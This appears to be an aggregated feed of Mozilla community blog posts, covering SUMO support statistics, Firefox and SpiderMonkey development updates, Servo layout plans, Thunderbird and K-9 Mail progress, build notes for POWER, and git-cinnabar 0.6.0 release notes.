Welcome note and shout-outs

  • Welcome to Kim Jae Woo, Henry Green, Jason Hoyle, Ifeoma, Ray Vermey, Ashfaq, Hisham, Peter, Varun, and Théo. Thanks for joining the Social and Mobile Store Support program!
  • Shout-outs to Tim Maks, Christophe, for participating in FOSDEM 2023! Also to Paul for his continued support for Mozfest over the years. You are all amazing!
  • Thanks to everybody for your participation in the Mozilla Support 2023 contributor survey. Your input and feedback are greatly appreciated. #MozLove to you all!

If you know anyone that we should feature here, please contact Kiki, and we’ll make sure to add them in our next edition.

Community news

  • What happened at FOSDEM 2023? Check out this blog post!
  • Learn more about Mozilla.social initiative if you’re into the fediverse world.
  • Watch the recording of our community call in March if you haven’t already to learn more about SUI (Simplified User Interface) screenshot that Lucas shared.
  • It’s also highly recommended to watch our community call in April to catch up on the result of the contributor survey we’ve done in Q1.

Catch up

  • Watch the monthly community call if you haven’t. Learn more about what’s new in January, February and March! Reminder: Don’t hesitate to join the call in person if you can. We try our best to provide a safe space for everyone to contribute. You’re more than welcome to lurk in the call if you don’t feel comfortable turning on your video or speaking up. If you feel shy to ask questions during the meeting, feel free to add your questions on the contributor forum in advance, or put them in our Matrix channel, so we can answer them during the meeting.
  • If you’re an NDA’ed contributor, you can watch the recording of the Customer Experience weekly scrum meeting from AirMozilla to catch up with the latest product updates.
  • Consider subscribe to Firefox Daily Digest to get daily updates about Firefox from across different platforms.
  • Check out SUMO Engineering Board to see what the platform team is currently doing.

Community stats

KB

KB pageviews (*)

* KB pageviews number is a total of KB pageviews for /en-US/ only

Month Page views Vs previous month
Jan 2023 7,199,541 5.53%
Feb 2023 7,288,066 2.88%
Mar 2023 7,485,556 2.71%

Top 5 KB contributors in the last 90 days: 

KB Localization

Top 10 locales based on total page views

Locale Jan 2023 

pageviews (*)

Feb 2023 pageviews (*) Mar 2023 

pageviews (*)

Localization progress (per Apr, 17)(**)
de 11.51% 10.34% 10.59% 98%
fr 7.66% 6.81% 7.81% 89%
zh-CN 5.05% 6.64% 7.27% 96%
es 5.91% 5.67% 6.06% 25%
ja 4.22% 4.11% 4.13% 46%
ru 4.09% 3.98% 3.93% 100%
pt-BR 3.00% 2.84% 3.39% 52%
It 2.75% 2.79% 2.65% 99%
pl 2.47% 2.24% 2.25% 88%
zh-TW 0.61% 0.98% 1.47% 3%

* Locale pageviews is an overall pageviews from the given locale (KB and other pages)

** Localization progress is the percentage of localized article from all KB articles per locale

Top 5 localization contributors in the last 90 days: 

Forum Support

Forum stats

Month Total questions Answer rate within 72 hrs Solved rate within 72 hrs Forum helpfulness
Jan 2023 2,888 77.77% 10.28% 47.12%
Feb 2023 2,752 66.10% 9.30% 54.79%
Mar 2023 3,450 66.02% 8.19% 48.91%

Top 5 forum contributors in the last 90 days: 

Social Support

Channel Total tweets Total moderation by contributors Total reply by contributors
Jan 2023 314 125 42
Feb 2023 344 140 62
Mar 2023 404 171 55

Top 5 Social Support contributors in the past 3 months: 

  1. Tim Maks 
  2. Bithiah K
  3. Théo C
  4. Daniel López
  5. Peter Gallwas

Play Store Support

Channel Jan 2023
Total reviews Total moderation by contributors Total reply by contributors
Firefox for Android 5,710 250 90
Firefox Focus for Android 785 63 23

 

Channel Feb 2023
Total reviews Total moderation by contributors Total reply by contributors
Firefox for Android 5,025 173 46
Firefox Focus for Android 558 17 4

 

Channel Mar 2023
Total reviews Total moderation by contributors Total reply by contributors
Firefox for Android 5,741 270 69
Firefox Focus for Android 588 29 7

Top 5 Play Store contributors in the past 3 months: 

Product updates

To catch up on product releases update, please watch the recording of the Customer Experience scrum meeting from AirMozilla. You can also subscribe to the AirMozilla folder by clickling on the Subscribe button at the top right corner of the page to get notifications each time we add a new recording.

Useful links:

Frederik BraunExamine Firefox Inter-Process Communication using JavaScript in 2023

This is my update to the 2021 JavaScript IPC blog post from the Firefox Attack & Defense blog.

Firefox uses Inter-Process Communication (IPC) to implement privilege separation, which makes it an important cornerstone in our security architecture. A previous blog post focused on fuzzing the C++ side of IPC. This blog …

Firefox NightlyJam-packed with Updates – These Weeks in Firefox: Issue 135

Highlights

  • In Firefox >= 113 users can now move the extensions button within the navigation toolbar while in Customize Mode (App Menu > More tools > Customize Toolbar)Gif of the extensions button being moved within the Firefox navigation bar via mouse drag and drop, which was never possible before until now
  • Hubert added the ability to override a script from the debugger (bug)
    • Triggers from right-click on a file in the debugger source tree, it will download the file on the user machine, so it can be edited, and the local file is the script that will be used in the page (a purple icon indicates when a file is overridden)Image of a context menu within the Firefox debugger showing four different menu options, one of which is selected and called "Add script override"
  • Nicolas added support for inline-script pretty printing, which was requested 9 years ago (bug)An image comparing a JavaScript file's formating before pretty-printing and after pretty-printing within the Firefox debugger.
  • Alex landed a patch that adds a Javascript tracer in the debugger (bug)
    • Behind  devtools.debugger.features.javascript-tracing, disabled by default
    • trace logs can be displayed in the console or stdout. Screenshot below show traces when disabling an extension in about:addonsImage of the JavaScript tracer toggle in the Firefox debugger
  • You can test the new migration wizard in Nightly by setting browser.migrate.content-modal.enabled to true. You can open it by visiting about:preferences, and clicking on the “Import Data” button in the General section.Image of the new migration wizard used for migrating data from another browser into Firefox, with the picture showing in particular how a user would select and import Safari bookmarks.
  • We recently updated the screenshots component theme to match the browser theme
    • Please test it out by flipping `screenshots.browser.component.enabled` to true
    • Please file any bugs you find here
    • The screenshots below show the buttons in dark themeImage of Firefox's screenshot component - which displays a close button, a copy button, and a download button - with updated themes that correspond with a dark theme loaded by the browser.Screenshot of the special Firefox page "about:config" taken with the screenshot component.
  • Thanks to lplanch for adding special characters / symbols to generated passwordsImage of Firefox's generate password prompt showcasing support for special characters, thus improving security
  • niklas landed a patch that adds a new URL bar entrypoint for Picture-in-Picture on Nightly. The PiP icon appears if a PiP-able video is loaded on the page.Screenshot of Firefox's URL bar containing several icons, including a brand new icon for the Picture-in-Picture feature which now allows users to watch videos in a new window from the URL bar

Friends of the Firefox team

Resolved bugs from March 21st meeting (skipped)

Resolved bugs (excluding employees)

Volunteers that fixed more than one bug

  • Abhijeet Chawla [:ff2400t}
  • Abhishek
  • Alvin
  • Bryan Macoy
  • CanadaHonk [:canadahonk]
  • Ebilite Uchenna
  • Itiel
  • Ganna
  • Lata
  • Leila Kaltouma
  • Leslie
  • ofrazy
  • portiawuu
  • Noah Osuolale
  • Nolan Ishii
  • Sauvic Paul Choudhury[:sauvic]
  • Shah
  • Siya
  • steven w

New contributors (🌟 = first patch)

 

Project Updates

Add-ons / Web Extensions

WebExtensions Framework
  • Cathy Lu worked on adapting the GeckoView tabs API implementation to support persisted event listeners (needed to make sure an extension event page wakes up on tabs event triggered on Firefox for Android) – Bug 1815310
  • William Durand worked on introducing a new Firefox Remote Debugging Protocol method to uninstall temporarily installed addon and enabled the about:debugging “Remove” and “Terminate Background” extension card actions for remotely connected Firefox instances (which includes both remote Firefox Desktop instances connected over TCP as well as remote Firefox for Android instances connected over ADB) – Bug 1824346, Bug 1823456 and Bug 1823457
  • Firefox >= 113 will persist and prime as expected multiple listeners even when they all share the same extra params – Bug 1795801
  • Fixed missing custom extension icon in permission popup – Bug 1822306
WebExtension APIs
  • As part of the ongoing work on the declarativeNetRequest API:
    • Introduced a startupCache file for the declarativeNetRequest data store, used to load pre-validated DNR rules at browser startup – Bug 1803365
    • Make sure only same-extension DNR rules are applied to network requests originated by extensions – Bug 1810753
    • Allow DNR rules to match POST requests of ancestor frames in allowAllRequests DNR rule action – Bug 1821303
    • Replaced extension.readJSON with fetch for reading static rules JSON files – Bug 1823390

Developer Tools

DevTools
  • External contributors
    • Thanks to Connor Pearson, screenshots are now placed in the images folder on OSX (bug)
    • Thanks to :zacnomore for improving the display of our pseudo class toggle UI (bug)Image comparing the Firefox devtools pseudo class toggle UI before and after changes that save space and display pseudo class toggles in a row
  • Contributions from other teams:
    • Gijs improved console.log for DOM nodes in stdout (bug)
      • console.* are printed to stdout when the following prefs are enabled: devtools.console.stdout.chrome and devtools.console.stdout.content
      • Before, logging a node would print: console.log: ({}) ,
      • Now: console.log: <div class=”webRTC-selectDevice-selector-container”>
  • Thanks to Gijs and Standard8 reports, Alex improved logging of DOMException and Components.Exception , showing a nicely formatted stacktrace (bug)Image of Firefox devtools showing easier to read log outputs of DOMException and Components.Exception as formatted stack traces

 

  • Hubert moved the Debugger Search UI to a regular side panel, which allows to keep the results list visible while opening scripts in the editor (bug)Image of Firefox's debugger Search UI located in a regular side panel, which allows the results list to remain visible while opening scripts in the editor
  • Julian fixed the network monitor performance analysis tools (bug)
  • linear() is a new animation timing function that landed in 112 (spec) and Nicolas added a widget to modify its arguments (bug)
    • double clicking on a point will remove it, double clicking anywhere else will add one, points can be moved with drag and drop, holding Shift will snap the point to the grid Image of a line graph that is displayed in Firefox devtools and can be interacted with for modifying the linear timing function for animations
  • Nicolas made it possible to add column breakpoints to pretty printed source (bug)
  • Alex added ChromeUtils.isDevToolsOpened which is a fast way to check if DevTools are opened (bug)
  • Alex landed many patches to improve the debugger reducers readability and performance (bug, bug, bug , bug , bug)
  • Alex fixed an issue where empty lines from inline scripts would be marked as breakable (bug)
  • Alex already improved the performance of the JavaScript Tracer (bug)
  • Hubert fixed regex search results highlighting (bug)
  • Hubert also added support for glob patterns in the debugger search (bug)
  • Julian made the simplified highlighter for prefers-reduced-motion optional (bug)
  • Nicolas fixed inconsistencies with highlighter icons in various DevTools (bug)
  • Nicolas fixed a recent regression which excluded timestamps from console messages when using Copy All Messages / Save All Messages to File (bug)
WebDriver BiDi
  • Sasha implemented WebDriver classic commands to find elements inside Shadow Roots (bug)
  • Julian added support for getComputedLabel and getComputedRole to WebDriver classic (bug)
  • Henrik released a new version of geckodriver: 0.33.0, which supports the new commands listed above (bug)
  • Henrik added a shared cache for Elements and ShadowRoots which can be used both by Marionette and WebDriver BiDi, and allows to use those references transparently between BiDi and Classic (bug)
  • Marionette now returns DOMTokenList instances as collections which will make it easier to work with objects such as Element.classList (bug)
  • Sasha improved the Print command to support the orientation and background parameters (bug, bug)
  • James added support for the input.performActions command to WebDriver BiDi, which allows to simulate various user events (bug)

ESMification status

  • A big jump this month. Thank you to all the Outreachy candidates who have been contributing as part of the contribution phase – they have provided a large part of this jump and helped convert a lot of the smaller directories in toolkit/.
  • There are now bugs filed to cover the rest of the conversions of toolkit/, but will need some volunteers to take them on.
  • Converting modules used in workers is waiting on ES module workers to ship.
  • ESMified status:
    • browser: 58.3%
    • toolkit: 61.8% (up from 39.2%)
    • Total: 66.4% (up from 55.1%)
  • #esmification on Matrix
  • Migration Document (with a walkthrough!)

Lint, Docs and Workflow

  • Enabling of the valid-jsdoc configuration has now been centralised to the top-level .eslintrc.js file. At the same time, we enabled the configuration wherever possible and made it so that it’ll be automatically enabled for new directories.
  • ./mach eslint –fix should now be faster. It was previously running twice when it didn’t really need to.
    • One side effect is that the count of “fixed” reported by ESLint, will be the number of fixed files, not the number of actual fixes.
  • The Python linters (pylint, isort, flake8) have been replaced by Ruff.
  • Work has started to separate running Prettier from ESLint.
    • Currently, these are run as part of the same process with Prettier integrated into ESLint.
    • This causes some formatting issues when running with the HTML plugin for ESLint (and formatting is turned on there).
    • It also is potentially slightly slower to run, and is no longer a recommended configuration.
    • Running them as separately will make it easier for editing – you can configure your editor to format on save, and not have it show errors about formatting.
    • ./mach eslint (or ./mach lint -l eslint) will automatically run both processes together.
  • As part of the separation, please use // prettier-ignore to disable formatting, rather than an ESLint directive (e.g. // eslint-disable prettier/prettier). See firefox-dev post here for more information.

Migration Improvements (CalState LA Project)

Password Manager

PDFs & Printing

Picture-in-Picture

  • Full controls have been enabled by default for beta and stable starting 113 (bug)Screenshot of video controls displayed for the Picture-in-Picture feature, including a video scrubber, seek forward and backward buttons, and a fullscreen toggle
  • Thanks so much to the following Outreachy applicants for their contributions to PiP:
  • niklas resolved Hulu subtitles and seeking problems
  • bnasar added a new Yahoo wrapper for Yahoo Finance and AOL to support PiP captions
  • bnasar modified the toggle position for reddit videos to reduce overlap with video controls and restored previously removed toggle policy CSS changes
  • You may have noticed that the regular PiP toggle design changed recently!

Search and Navigation

Search updates
  • Standard8 fixed a bug where search suggestions were sometimes not being fetched because focus was getting stuck to a search field within the page
  • Mandy wrote some new high-level in-tree documentation about the Search Service. Check it out here
  • Standard8 fixed an intermittent failure in one of the search telemetry tests
  • Standard8 reviewed the uses of the search_form field that’s been part of the search engine interfaces for a long time. (A search_form is the homepage for a search engine, google.com for example) He then landed a patch that removed unnecessary parameters sent to search form URLs
  • Abhishek, a community contributor, landed a patch that improves our handling of OpenSearch engine update URLs
  • Standard8 did a bit of clean up to the Search Service code by removing some code related to an old experiment
  • James added telemetry about how often users see search terms persisted in the URL bar and how often the search term has to be reverted due to a PopupNotification being shown
  • James also fixed a bug so that we now hide the persist search term tip when a PopupNotification is visible
  • James implemented an impression event for ad carousels as part of our ongoing experiments with Glean in SERP telemetry
Urlbar updates
  • Dao landed a patch that adds telemetry to the URL bar’s results menu
  • Dao also landed a patch so that the URL bar results menu for Firefox Suggest and Sponsored Suggest can be enabled separately
  • Daisuke fixed 8 bugs related to the URL bar event telemetry (1817206, 1817208, 1820081, 1820327, 1820453, 1821660, 1822210, 1822319)
  • James landed a patch so that now the site permissions, site identity and tracking protection icons are shown when we persist the search term in the URL bar
  • Standard8 fixed an issue in the Search Service where we were checking every 6 hours for OpenSearch engine updates. Now a timer is only registered for OpenSearch engines that have updates available, and the timer only checks once per day, not every 6 hours.
  • adw added telemetry related to URL bar navigational suggestions
  • adw fixed 2 bugs related to users seeing old weather results after their computer had been asleep or offline (1822918, 1823080)
  • Daisuke fixed a 13-year-old bug (assigned a whopping 13 points in Bugzilla) where opening a link where the target attribute is set to _blank would show about:blank in the address bar until the page loaded (610357)
  • adw fixed an issue with displaying high and low temperatures in the weather results that can appear in the address bar
  • Dao fixed an issue where the address bar results menu dismiss option wasn’t working for top picks and Firefox Suggest results
  • adw fixed an issue where users on a VPN were seeing weather suggestions for the VPN’s endpoint rather than their physical location. Now we no longer fetch weather suggestions when a VPN is active and re-fetch once the user disconnects from the VPN
  • adw also fixed a bug related to address bar engagement event telemetry
  • adw landed a patch that removes certain legacy telemetry non sponsored scalars for weather suggestions

Storybook / Reusable components

 

Firefox NightlyDropping the Banner Hammer and More – These Weeks in Firefox: Issue 134

Highlights

  • Cookie Banner Handling can now be enabled in Nightly via about:preferences#privacy. This will enable the feature for both normal and private browsing.
    • For more granular control you can use the cookiebanners.service.mode and cookiebanners.service.mode.privateBrowsing prefs. Supported modes are:
      • 0: Disabled
      • 1: Reject all (this is what the checkbox in the preferences enables)
      • 2: Reject all or fall back to accept all
  • The Performance Team has reported some recent wins on the Speedometer benchmark on Windows (Higher is better)
    • The two big jumps are from these two fixes. Great job, Performance Team!
  • Starting from Firefox 112, users can now search for text inside the about:addons page (through the usual associated keyboard shortcuts, e.g. Ctrl-F and ‘/’) – Bug 1499500
  • Hubert added search modifier in project search in the debugger (bug)

Friends of the Firefox team

Introductions/Shout-Outs

Resolved bugs (excluding employees)

Volunteers that fixed more than one bug

  • CanadaHonk [:canadahonk]
  • Itiel
  • Mathew Hodson
  • steven w

New contributors (🌟 = first patch)

Project Updates

Add-ons / Web Extensions

WebExtensions Framework
  • Thanks to Itiel, the default extension icons in the extensions button panel are now filled with the current theme color – Bug 1817865
  • In Nightly 112 we migrated the kvstore path used by ExtensionPermissions, to be sure that the kvstore path isn’t shared with the one used internally by ExtensionScriptingStore – Bug 1807010
    • NOTE: the underlying race issue was investigated and confirmed as part of Bug 1805427, and so be aware that despites the inline comment associated to nsIKeyValueService.getOrCreate in nsIKeyValue.idl states that it can be used for multiple database names stored in the same kvstore path, that isn’t thread safe with the SafeMode (and old LMDB mode is deprecated).
WebExtension APIs
  • Starting from Firefox 112, downloads.removeFile API calls that fail will be logging more detailed info about the actual underlying issue in the browser console – Bug 1807815

Developer Tools

DevTools
  • External contributors:
    • khadija fixed a visual issue in the netmonitor (bug)
    • marlene replaced wrong parameter value in calls to CodeMirror method from the debugger (bug)
  • Contributions from other teams:
    • bradwerth improved performance of the grid highlighter when there are a lot of columns in the grid (bug)
    • Emilio fixed a scaling issue in the inspector tooltip (bug)
  • Hubert also fixed an issue with Navigator.sendBeacon requests that were shown as Blocked in the Netmonitor even if they went through (bug)
  • Julian recovered a regression that broke network throttling in Netmonitor (bug)
  • Nicolas removed duplicated ChromeWorker messages in Browser Console (bug)
  • Nicolas improved performance of pretty printing in debugger (bug, bug)
  • Alex made it possible to copy text from Netmonitor HTML preview again (bug)
  • Alex landed a patch that does some groundwork (bug) for a new feature in the debugger that will let the user override HTTP responses with a local file (bug), which is in progress.
WebDriver BiDi
  • Sasha added the browsingContext.print command, which produces a base64-encoded PDF representation of the document (bug)
  • Henrik fixed an issue where TabSession.executeInChild would hang the message manager (bug)
  • Henrik vendored the latest version of puppeteer (19.7.2) which allows to run more tests in CI and have a better coverage of CDP (bug)
  • Henrik also fixed an issue where httpd.js listener wouldn’t stop, which could lead to unexpected side effects (bug)
  • Julian created a shared module to generate HAR files from WebDriver BiDi network events, which could be useful for libraries that are using BiDi like Browsertime and Selenium (bug)

ESMification status

Migration Improvements (CalState LA Project)

Performance

Privacy/Security

  • In addition to our initial list of site-specific cookie banner handling rules we are working on global rules that can handle a list of cookie banner libraries / providers on any site.
    • You can already test this in Nightly by enabling the pref cookiebanners.service.enableGlobalRules (beware of potential bugs and performance issues)

Search and Navigation

Storybook / Reusable components

Community

Spidermonkey Development BlogSpiderMonkey Newsletter (Firefox 112-113)

SpiderMonkey is the JavaScript engine used in Mozilla Firefox. This newsletter gives an overview of the JavaScript and WebAssembly work we’ve done as part of the Firefox 112 and 113 Nightly release cycles.

🛠️ Profiler instrumentation

We’re working with the performance team to improve profiler support for JIT code. This work allows us to see JS functions (and JIT optimization data) in profiles from tools such as samply. This makes it much easier for us to find and investigate performance issues in the engine.

  • We fixed some JIT code trampolines to properly maintain frame pointers.
  • We added better frame unwinding information for Windows so external profilers can iterate through JIT frames using frame pointers.
  • We added Windows ETW events for mapping JIT code to method names.
  • We added an optional mode for profiling that adds frame pointers to Baseline IC code.
  • We added an optional mode for profiling that adds entry trampolines for scripts running in the interpreters. This makes it possible to distinguish between different scripts that are executing in the interpreter.

🚀 Performance

We’re working on improving performance for popular web frameworks such as React. We can’t list all of these improvements here, but the list below covers some of this work.

  • We optimized global name lookups to use a generation counter instead of shape guards.
  • We added an optimization to guess the size of objects allocated by constructor functions.
  • We rewrote our implementation of Function.prototype.bind to be faster, simpler and use less memory.
  • We implemented monomorphic function inlining for cases where we can skip the trial inlining phase.
  • We added inlining of megamorphic cache lookups to Baseline ICs in addition to Ion.
  • We made our ArraySpeciesLookup cache more robust.
  • We made some improvements to the GC’s parallel marking implementation.
  • We changed our self-hosted builtins to use specialized intrinsics instead of arguments, to eliminate unnecessary arguments object allocations in the interpreter and Baseline tiers.

⚡ Wasm GC

High-level programming languages currently need to bring their own GC if they want to run on WebAssembly. This can result in memory leaks because it cannot collect cycles that form with the browser. The Wasm GC proposal adds struct and array types to Wasm so these languages can use the browser’s GC instead.

  • We profiled the dart-barista benchmark and fixed various performance issues.
  • We optimized allocation and GC support for Wasm GC objects.
  • We improved the memory layout of Wasm GC objects to be more efficient.

⚙️ Modernizing JS modules

We’re working on improving our implementation of modules. This includes supporting modules in Workers, adding support for Import Maps, and ESMification (replacing the JSM module system for Firefox internal JS code with standard ECMAScript modules).

  • See the AreWeESMifiedYet website for the status of ESMification. As of this week, almost 70% of modules have been ESMified 🎉
  • We’ve finished most of the work for worker modules. We’re hoping to ship this soon.

📚 Miscellaneous

The Servo BlogLayout 2013 and Layout 2020

Servo currently has two independent layout engines, known as Layout 2013 and Layout 2020, which are named after when they began development. Layout 2020 was designed to fix several shortcomings in Layout 2013, but it’s not yet enabled by default, and this raises the question: which layout engine should Servo use going forward?

To answer this question, we analysed the two layout engines and found differences in:

  • their approaches to parallelism
  • the ways they manage trees of boxes and fragments
  • their relationships with WebRender
  • the degrees to which their architectures reflect CSS specs
  • the completeness of their implementations of CSS features
  • the difficulty in supporting complex features like floats

For more details, check out our report, but in short, we believe Layout 2020 is the best layout engine for Servo going forward.

To give us more confidence in this choice with some practical experience, we’ve started implementing some smaller features in Layout 2020, like <iframe>, min/max width and height, sticky positioning, and ‘text-indent’. We will also start building and testing Layout 2020 (as well as Layout 2013) on CI in the near future.

We will continue to maintain Layout 2013 for now, but we hope that completing many of these features, plus some more complex ones like counters and vertical writing modes, will give us the experience we need to decide whether we want to commit to Layout 2020 and remove Layout 2013 from the tree.

We would love to have you with us on this journey, and we hope that after this transition period, together we can tackle the most challenging parts of Servo’s CSS2 story, like floats and incremental layout!

Mozilla ThunderbirdThese Top 20 Thunderbird Feature Requests Need Your Vote

Lightbulb icon, alongside text that says "Top 20 Thunderbird Ideas."

At Thunderbird, we enthusiastically embrace open development. That means more than making our software open-source. It also means being as transparent as possible, and communicating frequently with our global family of users. 

We want that communication to go both ways! Which is why Mozilla Connect is such an important tool for telling us the features you want to see get developed for Thunderbird (and soon, for our entire family of products and services). Mozilla Connect is an easy-to-use community tool that can help shape future Thunderbird (and Firefox) releases. It allows you to post a feature request, contribute your opinions to existing ones, and give kudos to the features you believe in.

We’re actively monitoring your Thunderbird feature suggestions at Mozilla Connect, but “voting up” ideas from the community is crucial. There are currently 287 Thunderbird ideas at Connect, many of which need wider discussion and votes.

With that in mind, we collected the Top 20 feature requests and linked them below. Check them out, and please consider lending your voice and your votes to these ideas – and the other 267 – if you believe in them.

Top 20 Thunderbird Feature Ideas At Mozilla Connect

  1. Android version of Thunderbird (in progress!)
  2. Color for Thunderbird accounts
  3. Better Gnome Desktop Integration
  4. Expand relay to create full mozmail E-mail
  5. Firefox Translations in Thunderbird (see Firefox Translations call)
  6. Integrate Google Chat with Mozilla Thunderbird
  7. Thunderbird Labels colors – change background color instead of text color
  8. Make telephone numbers clickable in Thunderbird Address book
  9. Thunderbird: Group by date
  10. Migrate and cleanup Thunderbird profile
  11. Make delayed/planned sending of emails possible
  12. Add the option to sort conversations with last post first
  13. RSS feature in Thunderbird adds Pocket button
  14. Option to disable opening PDF directly in Thunderbird
  15. Thunderbird should by default have all telemetry as an opt-in option
  16. Bring back support for accent insensitive message search filter
  17. Include a QR code Decoder into Thunderbird
  18. Thunderbird Web, I’d pay a sub fee for it
  19. Delete a mail directly from notification
  20. An Option to Resend a Message Again

There are some undeniably smart and useful suggestions here. We look forward to seeing your feedback at Mozilla Connect.

Last but not least, we absolutely encourage you to submit your own ideas! Just be sure to use #Thunderbird in the body of the message.

The post These Top 20 Thunderbird Feature Requests Need Your Vote appeared first on The Thunderbird Blog.

Mozilla Open Policy & Advocacy BlogMozilla Meetups with CDT: Talking Tech Transparency

Join Mozilla and the Center for Democracy & Technology (CDT) for a conversation about Congress’ work on tech transparency. The event will feature keynote remarks from U.S. Congresswoman Lori Trahan followed by an expert panel discussion.

The panel and remarks will be immediately followed by a happy hour reception where drinks and light fare will be served.

Date and time: Wednesday, April 26th – event starts @ 4:00PM promptly (doors @ 3:45pm)
Location: Jackie, 79 Potomac Ave SE, Washington, DC 20003

Registration is closed.

The post Mozilla Meetups with CDT: Talking Tech Transparency appeared first on Open Policy & Advocacy.

Mozilla ThunderbirdThunderbird for Android / K-9 Mail: March Progress Report

Thunderbird for Android and K-9 Mail, March progress report

Last month we reported on our progress in turning K-9 Mail into Thunderbird for Android. Since then a month has passed, so it’s time for another detailed update.

(If you missed the exciting news last summer, K-9 Mail is now part of the Thunderbird family, and we’re working steadily on transforming it into Thunderbird for Android. If you want to learn more, check out our Android roadmap, this blog post, and this FAQ.)

Towards a new stable release

The goal for March was to get the app into shape for a new stable release. We didn’t quite get there, but we should be close now.

✨ Polishing the user interface

In February we introduced changes to the message view and message list screens. In March we spent quite some time polishing the UI and fixing bugs in that newly added code.

📃 Message list

After experimenting with displaying the colored account indicator to the left of the subject/sender text, we decided to move it back to where it was in K-9 Mail 6.400.

<figcaption class="wp-element-caption">K-9 Mail 6.509: Colored account indicator to the left of the text</figcaption>
<figcaption class="wp-element-caption">K-9 Mail 6.511: Colored account indicator in line with text</figcaption>

We updated the “snackbar” that is displayed after the app was updated to disappear automatically after 10 seconds.

<figcaption class="wp-element-caption">K-9 Mail 6.511: “Find out what’s new in this release” notice</figcaption>

A keen observer will notice that we also changed the appearance of the floating button used to compose a new message. It now only shows an icon and the button is hidden when the message list is scrolled down.

📥 Message view

In a previous beta version we accidentally increased the size of the star in the message view. We fixed that, and also reduced the size of the account “chip”.

<figcaption class="wp-element-caption">K-9 Mail 6.509: Large account indicator and message star</figcaption>
<figcaption class="wp-element-caption">K-9 Mail 6.509: Large account indicator and message star</figcaption>

We also added a setting to specify the font size of the account name under Settings → General settings → Display → Font size → Account name.

🪲 Bug fixes

Thanks to our beta testers we were able to track down and and fix a couple bugs:

  • Toolbar icons in the message view screen were missing when the app was killed while in the background and restored afterwards.
  • When the message list was updated while the user was swiping between messages, the swipe action was canceled, and the previously displayed message was displayed again.
  • The layout of the message details screen wasn’t adjusted when contact pictures were disabled, leading to contact picture sized gaps in the layout.
  • A couple of other minor bugs.

📃 User Manual & Updating Screenshots

Did you know that K-9 Mail has a user manual? It can be found under docs.k9mail.app.

We updated the site to support multiple app versions and languages. For now, though, the user manual is only available in English.

In preparation for a new stable version, we added a “6.5xx (beta)” version and started updating the screenshots throughout the user manual. It turns out there’s quite a lot of them, and basically all of the screenshots need to be updated because the appearance of the app has changed since the last stable version. This is tedious work and has to be done every time we make visual changes that affect the whole app. So we started automating this task 🤖

Design system

Over the years, the visual appearance of Android has changed quite a lot, and so has the appearance of K-9 Mail. However, due to lack of resources, we never managed to update the whole app at once. And so the app still is a mix of different visual styles.

To improve this situation, we started working on implementing a design system – reusable components that can be assembled to build the different screens of the app. We’ll use it for new screens added to the app and will slowly migrate existing screens to using the design system.

Hopefully, this will allow us to react faster to design changes in Android in the future. For now, we’re still playing catch-up.

Releases

In March 2023 we published the following beta versions:

On behalf of the entire team, thanks very much for using K-9 Mail. We can’t wait to put Thunderbird for Android in your hands later this summer!

The post Thunderbird for Android / K-9 Mail: March Progress Report appeared first on The Thunderbird Blog.

The Talospace ProjectFirefox 111 on POWER

This got a bit delayed due to $DAYJOB interfering with my important hacking and writing time (darn having to make a living), but Firefox 111 is out. As usual you'll need to deal with bug 1775202 either with this patch — but without the line containing desktop_capture/desktop_capture_gn, since that's been gone since the latest WebRTC update — or put --disable-webrtc in your .mozconfig if you don't need WebRTC. The workaround adding #pragma GCC diagnostic ignored "-Wnonnull" to js/src/irregexp/imported/regexp-parser.cc for optimized builds fortunately was addressed by bug 1810584, so you no longer need it, and the browser otherwise builds and works with the PGO-LTO patch for Firefox 110 and the .mozconfigs from Firefox 105.

Niko MatsakisFix my blog, please

It’s well known that my blog has some issues. The category links don’t work. It renders oddly on mobile. And maybe Safari, too? The Rust snippets are not colored. The RSS feed is apparently not advertised properly in the metadata. It’s published via a makefile instead of some hot-rod CI/CD script, and it uses jekyll instead of whatever the new hotness is.1 Being a programmer, you’d think I could fix this, but I am intimidated by HTML, CSS, and Github Actions. Hence this call for help: I’d like to hire someone to “tune up” the blog, a combination of fixing the underlying setup and also the visual layout. This post will be a rough set of things I have in mind, but I’m open to suggestions. If you think you’d be up for the job, read on.

Desiderata2

In short, I am looking for a rad visual designer who also can do the technical side of fixing up my jekyll and CI/CD setup.

Specific works item I have in mind:

  • Syntax highlighting
  • Make it look great on mobile and safari
  • Fix the category links
  • Add RSS feed into metadata and link it, whatever is normal
  • CI/CD setup so that when I push or land a PR, it deploys automatically
  • “Tune up” the layout, but keep the cute picture!3

Bonus points if you can make the setup easier to duplicate. Installing and upgrading Ruby is a horrible pain and I always forget whether I like rbenv or rubyenv or whatever better. Porting over to Hugo or Zola would likely be awesome, so long as links and content can be preserved. I do use some funky jekyll plugins, though I kind of forgot why. Alternatively maybe something with docker?

Current blog implementation

The blog is a jekyll blog with a custom theme. Sources are here:

  • https://github.com/nikomatsakis/babysteps
  • https://github.com/nikomatsakis/nikomatsakis-babysteps-theme

Deployment is done via rsync at present.

Interested?

Send me an email with your name, some examples of past work, any recommendations etc, and the rate you charge. Thanks!

  1. On the other hand, it has that super cute picture of my daughter (from around a decade ago, but still…). And the content, I like to think, is decent. 

  2. I have a soft spot for wacky plurals, and “desiderata” might be my fave. I heard it first from a Dave Herman presentation to TC39 and it’s been rattling in my brain ever since, wanting to be used. 

  3. Ooooh, I always want nice looking tables like those wizards who style github have. How come my tables are always so ugly? 

Mike HommeyAnnouncing git-cinnabar 0.6.0

Git-cinnabar is a git remote helper to interact with mercurial repositories. It allows to clone, pull and push from/to mercurial remote repositories, using git.

Get it on github.

These release notes are also available on the git-cinnabar wiki.

What’s new since 0.5.11?

  • Full rewrite of the Python parts of git-cinnabar in Rust.
  • Push performance is between twice and 10 times faster than 0.5.x, depending on scenarios.
  • Based on git 2.38.0.
  • git cinnabar fetch now accepts a --tags flag to fetch tags.
  • git cinnabar bundle now accepts a -t flag to give a specific bundlespec.
  • git cinnabar rollback now accepts a --candidates flag to list the metadata sha1 that can be used as target of the rollback.
  • git cinnabar rollback now also accepts a --force flag to allow any commit sha1 as metadata.
  • git cinnabar now has a self-update subcommand that upgrades it when a new version is available. The subcommand is only available when building with the self-update feature (enabled on prebuilt versions of git-cinnabar).
  • Disabled inexact copy/rename detection, that was enabled by accident.

What’s new since 0.6.0rc2?

  • Fixed use-after-free in metadata initialization.
  • Look for the new location of the CA bundle in git-windows 2.40.

Mitchell BakerA Quarter Century of Mozilla

March 31, or “three thirty-one,” is something of a talisman in the Mozilla community. It’s the date that, back in 1998, Mozilla first came into being — the date that we open-sourced the Netscape code for the world to use.

